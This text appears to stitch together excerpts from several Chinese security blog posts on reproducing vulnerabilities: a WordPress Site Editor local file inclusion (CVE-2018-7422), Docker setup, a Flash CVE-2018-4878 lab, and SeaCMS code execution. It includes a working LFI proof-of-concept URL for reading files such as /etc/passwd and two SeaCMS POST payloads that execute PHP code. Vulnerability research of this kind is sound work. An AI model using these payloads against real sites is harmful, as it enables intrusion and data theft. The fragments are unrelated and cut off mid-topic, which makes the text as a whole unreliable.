0x01 前言

大概有一周没有写文章了,比赛完嗨皮了两天,喝酒喝到半夜回来继续看文章,看到了exploit的关于wordpress一个漏洞信息CVE-2018-7422 ,下面就来分析一下这个本地文件包含的漏洞代码,如果权限够的话是可以读取系统的一些敏感的文件例如:/etc/passwd、/etc/shadow等。

0x02 漏洞复现

环境

攻击机:Deepin Linux x64
Wordpress服务器:Windows 10 x64 (phpstudy)
搭建环境有些要注意的,例如上传插件是大于2M的,要php.ini里面修改下再重启下就行了。

Proof of Concept

1
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=要读取的文件绝对路径或者相对路径

1. 前言

最近练习也在搭建这个漏洞环境,但是很费时间,然后就想到用Docker搭建比较快,又方便。不多废话,直接开始吧!

2. 下载Docker

我本次是利用Windows 10 来安装Docker,因为Windows出现了一个问题需要解决下,Linux和Mac安装官网的安装方法基本没什么问题。

官方下载地址:https://docs.docker.com/docker-for-windows/install/

安装/升级你的Docker客户端

对于Windows 10以下的用户 推荐使用 Docker Toolbox
Toolbox的介绍和帮助:mirrors.aliyun.com/help/docker-toolbox

Windows系统的安装文件目录:http://mirrors.aliyun.com/docker-toolbox/windows/docker-toolbox/

对于Windows 10以上的用户 推荐使用 Docker for Windows
Windows系统的安装文件目录:http://mirrors.aliyun.com/docker-toolbox/windows/docker-for-windows/

前言

这几天很忙,已经有两天没有更新文章了,最近CVE-2018-4878挺火的,还有群里的人也问这个怎么复现。今天就献丑复现一下,大表哥别喷,虽然我还没研究到这方面的漏洞分析,我会努力的,相信不久我也能写出二进制漏洞分析的文章。

该漏洞影响 Flash Player 当前最新版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞。从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KR-CERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发起攻击。

环境

攻击机: kali 2018 (192.168.59.6)
靶机: Windows 10 x64 (192.168.59.160)
Web服务器: Windows 7 X64 (192.168.59.127)

前言

前几天在先知看到的漏洞,就很想写个分析过程了的,因为比赛培训和在审计一个CMS拖到了今天。

环境

Web: phpstudy
System: Windows 7 X64
Browser: Firefox Quantum
Python version : 2.7
Tools: PhpStorm 2017.3.3、Seay源代码审计系统

任意文件删除漏洞

复现

POC

前提:需要由对应的删除权限
flienamecsv代表要删除的文件

前言

这两个版本修复上次的v6.45版本中的order传值后执行的漏洞,但是在新的版本里面利用parseIf函数的功能还可以继续利用。
因为上一篇也已经过了一遍search.php的执行过程,这篇就不再重复讲解了。
链接:http://getpass.cn/2018/03/02/SeaCMS%20v6.45%E5%89%8D%E5%8F%B0Getshell%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E(%E6%AF%8F%E6%97%A5%E4%B8%80%E6%B4%9E)/

环境

Web: phpstudy
System: Windows 10 X64
Browser: Firefox Quantum
Python version : 2.7

v6.54漏洞详情

漏洞代码执行

Payload

get:http://seacms.test/search.php
POST: searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=ph&9[]=pinfo();

执行结果

前言

昨晚审计到了三点,今天还要整理宿舍就没有写文章。这个CMS没有用框架,漏洞的执行过程我看了很久才看完,下面就写漏洞执行过程和POC构造还有用Python编写批量Getshell脚本。

环境

Web: phpstudy
System: Windows 10 X64
Browser: Firefox Quantum
Python version : 2.7

漏洞代码执行过程分析

先看一下这个代码是一个怎么执行的吧,我画了一个流程图,有点简陋,不过如果真的要深入了解一定要亲自去看一遍代码才行。

漏洞详情

漏洞代码执行

Payload代码

http://seacms.test/search.php
POST:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}